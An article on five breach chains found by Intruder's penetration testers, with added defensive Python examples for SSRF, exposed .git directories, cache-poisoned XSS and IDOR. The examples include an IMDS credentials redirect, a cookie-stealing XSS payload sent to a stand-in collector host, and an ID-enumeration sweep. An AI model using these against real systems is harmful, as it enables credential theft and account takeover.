How Small Vulnerabilities Trigger Big Breaches – Five Lessons from the Front Line
A research team from Intruder dissected five real-world security incidents to show how seemingly “low-risk” flaws can snowball into full-scale breaches:
1. SSRF → AWS credential theft – an application followed a 302 redirect to the EC2 instance metadata service, leaking the instance's temporary IAM credentials.
2. Exposed .git repository → SQL injection – a publicly reachable .git directory gave up the source code, which revealed an authentication bypass and then a SQL-injection flaw that ultimately granted database access.
3. ExifTool PDF bug → remote code execution – an outdated ExifTool build, still vulnerable to CVE-2021-22204, let a crafted PDF run commands on the host server.
4. Self-XSS + cache poisoning → site-wide account takeover – two “minor” bugs combined to hijack every user session.
5. IDOR → mass data leakage – simply changing an ID in an API call exposed CVs, orders and user profiles.
Intruder argues that continuous external-asset discovery and prompt hardening (e.g., enforcing AWS IMDSv2, blocking web access to .git directories, patching libraries) would have broken each attack chain before real damage occurred.
Cyber attackers rarely kick in the front door; instead, they exploit overlooked gaps and chain them together. Recent findings from the penetration-testing team at Intruder reveal how modest bugs can escalate into headline-grabbing incidents.
1. A Redirect That Stole the Cloud
A routine webhook in a home-moving app dutifully followed a 302 redirect, straight to the AWS instance metadata service at 169.254.169.254. Within seconds the service had recorded the temporary IAM credentials returned by that request, handing would-be intruders the keys to the cloud. Enforcing IMDSv2, which requires a session token obtained with a PUT request that a redirected GET can never supply, would have slammed that door shut.
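The application-side fix is to stop trusting redirects at all: resolve every hop yourself and refuse anything that lands on a link-local, loopback or private address. The following is an added example, not Intruder's code or the affected app's; the request function is injected (so the logic runs offline here), the 203.0.113.10 webhook host and the `malicious_webhook` stub are constructed, and the blocklist is the one I would ship, not one the write-up specifies.

```python
"""SSRF-hardened outbound fetcher that re-validates every redirect hop.

Added example, not Intruder's or the affected app's code. The request
function is injected so the logic can be exercised offline; in production
pass something like
  lambda u: (lambda r: (r.status_code, r.headers, r.content))(
      requests.get(u, allow_redirects=False, timeout=5))
"""
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

# Destinations an outbound webhook must never reach. 169.254.0.0/16 contains the
# cloud instance metadata service (169.254.169.254 on AWS, GCP and Azure);
# fd00:ec2::254 is the AWS IPv6 IMDS endpoint; the rest are loopback, RFC 1918,
# CGNAT, "this network" and IPv6 local ranges.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "100.64.0.0/10", "0.0.0.0/8",
    "::1/128", "fe80::/10", "fc00::/7", "fd00:ec2::254/128",
)]
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5


def resolve_host(host):
    """All addresses a hostname resolves to; an IP literal resolves to itself.

    IPv4-mapped IPv6 literals (::ffff:169.254.169.254) are unwrapped so the
    IPv4 blocklist applies to them as well.
    """
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = [ipaddress.ip_address(info[4][0])
                 for info in socket.getaddrinfo(host, None)]
    return [a.ipv4_mapped if getattr(a, "ipv4_mapped", None) else a for a in addrs]


def is_safe_target(url):
    """True only for http(s) URLs whose host resolves exclusively to addresses
    outside BLOCKED_NETWORKS. Unresolvable or unparsable hosts are unsafe."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addrs = resolve_host(parts.hostname)
    except (socket.gaierror, ValueError):
        return False
    return all(not any(a in net for net in BLOCKED_NETWORKS) for a in addrs)


def fetch_with_safe_redirects(url, do_request, max_redirects=MAX_REDIRECTS):
    """Follow redirects by hand, validating the destination before each hop.

    do_request(url) -> (status, headers, body) and must NOT follow redirects
    itself. Returns (status, body); raises ValueError on a blocked hop or when
    the redirect chain is too long. Header lookup is case-sensitive here for
    brevity; real HTTP libraries expose case-insensitive header maps.
    """
    for _ in range(max_redirects + 1):
        if not is_safe_target(url):
            raise ValueError(f"refusing to fetch non-public target: {url}")
        status, headers, body = do_request(url)
        if status not in REDIRECT_STATUSES or not headers.get("Location"):
            return status, body
        url = urljoin(url, headers["Location"])   # Location may be relative
    raise ValueError("too many redirects")


# Constructed stand-in for the attacker's webhook endpoint: answers the first
# request with a 302 pointing at the IMDS credentials path.
def malicious_webhook(url):
    if url == "https://203.0.113.10/hook":
        return 302, {"Location": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}, b""
    return 200, {}, b"should never be reached"


def demo():
    """True when the redirect to IMDS was refused rather than followed."""
    try:
        fetch_with_safe_redirects("https://203.0.113.10/hook", malicious_webhook)
    except ValueError as exc:
        return "169.254.169.254" in str(exc)
    return False


if __name__ == "__main__":
    print("redirect to metadata service blocked:", demo())
```

Two caveats a practitioner would add. First, the check resolves DNS at validation time, so a host that rebinds between validation and connect can still slip through; pin the resolved address when opening the socket or route outbound calls through an egress proxy that enforces the same list. Second, the host-side control is independent of the application: on AWS, `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required` makes IMDSv2 mandatory, so even a naive client that follows the redirect gets nothing back.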
2. When a .git Folder Leads to a University’s Database
An exposed .git directory gave up the application's source code; reading it revealed an authentication bypass and then a blind SQL-injection flaw. One casual misconfiguration snowballed into access to thousands of student records.
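Checking for this on your own estate is cheap, but a naive "does /.git/HEAD return 200" probe is fooled by catch-all pages that answer every path with 200. The check below, an added example rather than Intruder's scanner, validates the content against what a real repository file looks like; the two 203.0.113.x hosts and their responses are constructed.

```python
"""Detect a web-exposed .git directory without being fooled by soft-404 pages.

Added example (not Intruder's scanner). do_request(url) -> (status, body) is
injected so the check runs offline here; in production pass e.g.
  lambda u: (lambda r: (r.status_code, r.content))(requests.get(u, timeout=5))
"""
import re
from urllib.parse import urljoin

# A real .git/HEAD is either a symbolic ref or a bare 40-hex commit id;
# .git/config has a [core] section with repositoryformatversion. Anything else
# served with 200 is almost certainly a catch-all page, not the repository.
HEAD_REF = re.compile(r"^ref: refs/heads/\S+$")
HEAD_SHA = re.compile(r"^[0-9a-f]{40}$")
CONFIG_MARKER = re.compile(r"^\[core\]", re.MULTILINE)


def looks_like_git_head(body: bytes) -> bool:
    text = body.decode("utf-8", "replace").strip()
    return bool(HEAD_REF.match(text) or HEAD_SHA.match(text))


def looks_like_git_config(body: bytes) -> bool:
    text = body.decode("utf-8", "replace")
    return bool(CONFIG_MARKER.search(text)) and "repositoryformatversion" in text


PROBES = (
    (".git/HEAD", looks_like_git_head),
    (".git/config", looks_like_git_config),
)


def check_git_exposure(base_url, do_request):
    """Return the .git paths that are reachable AND contain genuine git content.

    base_url should end with "/" (urljoin replaces the last path segment otherwise).
    """
    exposed = []
    for path, is_genuine in PROBES:
        status, body = do_request(urljoin(base_url, path))
        if status == 200 and is_genuine(body):
            exposed.append(path)
    return exposed


# Constructed responses for two hypothetical hosts: one really exposes its
# repository, the other answers every unknown path with a 200 "not found" page.
EXPOSED_SITE = {
    "https://203.0.113.20/.git/HEAD": (200, b"ref: refs/heads/main\n"),
    "https://203.0.113.20/.git/config": (
        200, b"[core]\n\trepositoryformatversion = 0\n\tfilemode = true\n"),
}
SOFT404_SITE = {}


def fake_fetch(site):
    """Build a do_request() over a constructed response table."""
    def do_request(url):
        return site.get(url, (200, b"<html><body>Page not found</body></html>"))
    return do_request


if __name__ == "__main__":
    print("exposed site:", check_git_exposure("https://203.0.113.20/", fake_fetch(EXPOSED_SITE)))
    print("soft-404 site:", check_git_exposure("https://203.0.113.21/", fake_fetch(SOFT404_SITE)))
```

A positive result should be treated as full source disclosure: with HEAD and the object store reachable, an attacker can walk the packed refs and objects and reconstruct the working tree even when directory listing is off. The fix belongs at the web server or reverse proxy, not in the application, e.g. an nginx `location ~ /\.git { return 404; }` block, together with a deployment process that does not copy the repository into the document root in the first place.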
3. Out-of-Date Library, Full Remote Control
A document-signing platform disclosed that it used ExifTool, and the deployed version still harboured CVE-2021-22204 (fixed in ExifTool 12.24). A crafted PDF gave testers remote command execution and, with a little pivoting, potential root access.
4. Self-XSS? Harmless—Until It Isn’t
On an auction site, a self-XSS in a header seemed low impact: only the person sending the header could trigger it against themselves. Combined with cache poisoning, however, the cached response carried the payload to every visitor of the page automatically, allowing wholesale account takeover.
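The mechanics are easiest to see in a small model. The block below is an added example, not the auction site's code, and it assumes one common way the two bugs combine (the write-up does not say which): the origin reflects an unkeyed request header, here X-Forwarded-Host, into the page unescaped, while the cache in front of it keys responses on the path alone. The payload, hostnames and the 203.0.113.9 collector address are constructed.

```python
"""Self-XSS turned site-wide via web cache poisoning (added example).

Models one common way the two bugs combine, which is an assumption about the
auction-site case rather than a detail the write-up gives: the origin reflects
an unkeyed request header (here X-Forwarded-Host) into the page unescaped, and
the cache in front of it keys responses on the path alone.
"""
import html

# Constructed payload: breaks out of the href attribute and ships the cookie off.
PAYLOAD = 'x"><script>fetch("https://203.0.113.9/?c="+document.cookie)</script>'


def origin(headers, escape_output):
    """Simulated origin server. The canonical link is built from X-Forwarded-Host
    when present; escape_output=False is the vulnerable (raw reflection) behaviour."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    if escape_output:
        host = html.escape(host, quote=True)
    return (f'<html><head><link rel="canonical" href="https://{host}/"></head>'
            f'<body>auction</body></html>')


class Cache:
    """Simulated CDN cache. With key_on_forwarded_host=False the X-Forwarded-Host
    value is unkeyed: whoever populates the entry first decides what everyone sees."""

    def __init__(self, key_on_forwarded_host):
        self.key_on_forwarded_host = key_on_forwarded_host
        self.store = {}

    def _key(self, path, headers):
        extra = headers.get("X-Forwarded-Host") if self.key_on_forwarded_host else None
        return (path, extra)

    def get(self, path, headers, render):
        key = self._key(path, headers)
        if key not in self.store:
            self.store[key] = render(headers)
        return self.store[key]


def simulate(escape_output, key_on_forwarded_host):
    """True if an ordinary visitor ends up receiving the attacker's script."""
    cache = Cache(key_on_forwarded_host)
    render = lambda headers: origin(headers, escape_output)
    # Attacker: a single request carrying the malicious header populates the cache.
    cache.get("/", {"Host": "auction.example", "X-Forwarded-Host": PAYLOAD}, render)
    # Victim: a normal request for the same path, no special header.
    victim_page = cache.get("/", {"Host": "auction.example"}, render)
    return "<script>" in victim_page


if __name__ == "__main__":
    print("vulnerable (raw reflection, path-only key):", simulate(False, False))
    print("fixed by escaping output:", simulate(True, False))
    print("fixed by keying on the header:", simulate(False, True))
```

Either change alone breaks the chain in the model, but only output encoding removes the underlying XSS; keying the header (or, better, stripping unexpected forwarding headers at the edge) just stops the cache from amplifying it. Do both, and when hunting for this class of bug, look for any request input that changes the response but does not appear in the cache key.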
5. Change One Number, Download Everything
Classic insecure direct object reference (IDOR): the API checked that the caller was logged in but never that the requested record belonged to them, so tweaking an identifier in the call returned someone else's CV, order or profile. The testers harvested thousands of private records in minutes.
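The vulnerable and fixed handlers differ by one ownership check, and the sweep the testers ran leaves an obvious trace in access logs. The following added example (not the tested API's code) shows both sides; the CV records, user names, `/api/cv/<id>` route and the log line format are all constructed for the demonstration.

```python
"""IDOR: authenticated but unauthorised object access, and a log-side detector.

Added example (not the tested API's code). Data, users, route and the log
format are constructed for the demonstration.
"""
import re
from collections import defaultdict

# Sequential, guessable ids: the same shape as the API in the write-up.
CVS = {
    1001: {"owner": "alice", "text": "Alice - Senior Engineer"},
    1002: {"owner": "bob", "text": "Bob - Data Analyst"},
    1003: {"owner": "carol", "text": "Carol - Project Manager"},
}


class Forbidden(Exception):
    pass


def get_cv_vulnerable(cv_id, current_user):
    """Checks that *someone* is logged in, never that the CV belongs to them."""
    if current_user is None:
        raise Forbidden("login required")
    return CVS[cv_id]["text"]          # KeyError for unknown ids


def get_cv_fixed(cv_id, current_user):
    """Authorises on ownership. Unknown and foreign ids fail identically, so the
    endpoint cannot be used as an oracle for which ids exist."""
    if current_user is None:
        raise Forbidden("login required")
    record = CVS.get(cv_id)
    if record is None or record["owner"] != current_user:
        raise Forbidden("not found")
    return record["text"]


def enumerate_ids(fetch, user, first_id, last_id):
    """What the testers did: walk the id range and keep whatever the API returns."""
    leaked = {}
    for cv_id in range(first_id, last_id + 1):
        try:
            leaked[cv_id] = fetch(cv_id, user)
        except (Forbidden, KeyError):
            continue
    return leaked


# Detection side: in access logs an IDOR sweep shows up as one principal
# successfully reading many distinct object ids. Log line format is constructed.
LOG_LINE = re.compile(r"user=(\w+) GET /api/cv/(\d+) (\d{3})")


def detect_enumeration(log_lines, max_distinct_ids=3):
    """Return users who fetched more than max_distinct_ids distinct CVs with a 200.
    The threshold is tiny for the sample data; tune it to real traffic."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.search(line)
        if m and m.group(3) == "200":
            seen[m.group(1)].add(int(m.group(2)))
    return sorted(user for user, ids in seen.items() if len(ids) > max_distinct_ids)


# Constructed sample log: alice reads her own CV twice, mallory sweeps the range.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z user=alice GET /api/cv/1001 200",
    "2024-05-01T10:00:02Z user=alice GET /api/cv/1001 200",
    "2024-05-01T10:01:00Z user=mallory GET /api/cv/1000 404",
    "2024-05-01T10:01:01Z user=mallory GET /api/cv/1001 200",
    "2024-05-01T10:01:02Z user=mallory GET /api/cv/1002 200",
    "2024-05-01T10:01:03Z user=mallory GET /api/cv/1003 200",
    "2024-05-01T10:01:04Z user=mallory GET /api/cv/1004 200",
    "2024-05-01T10:01:05Z user=mallory GET /api/cv/1005 200",
]


if __name__ == "__main__":
    print("vulnerable:", enumerate_ids(get_cv_vulnerable, "alice", 1000, 1005))
    print("fixed:", enumerate_ids(get_cv_fixed, "alice", 1000, 1005))
    print("suspicious users:", detect_enumeration(SAMPLE_LOG))
```

Swapping sequential ids for random ones slows a sweep down but is not a fix; the authorisation check in `get_cv_fixed` is the control, and the rate-based detector is the safety net for the endpoints you have not yet reviewed.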
Stop Breaches Before They Start
The pattern is clear: map what's exposed, patch quickly and block attackers from joining the dots. Continuous discovery and scanning platforms (Intruder is one example) flag misconfigurations such as exposed metadata services or forgotten subdomains before criminals do.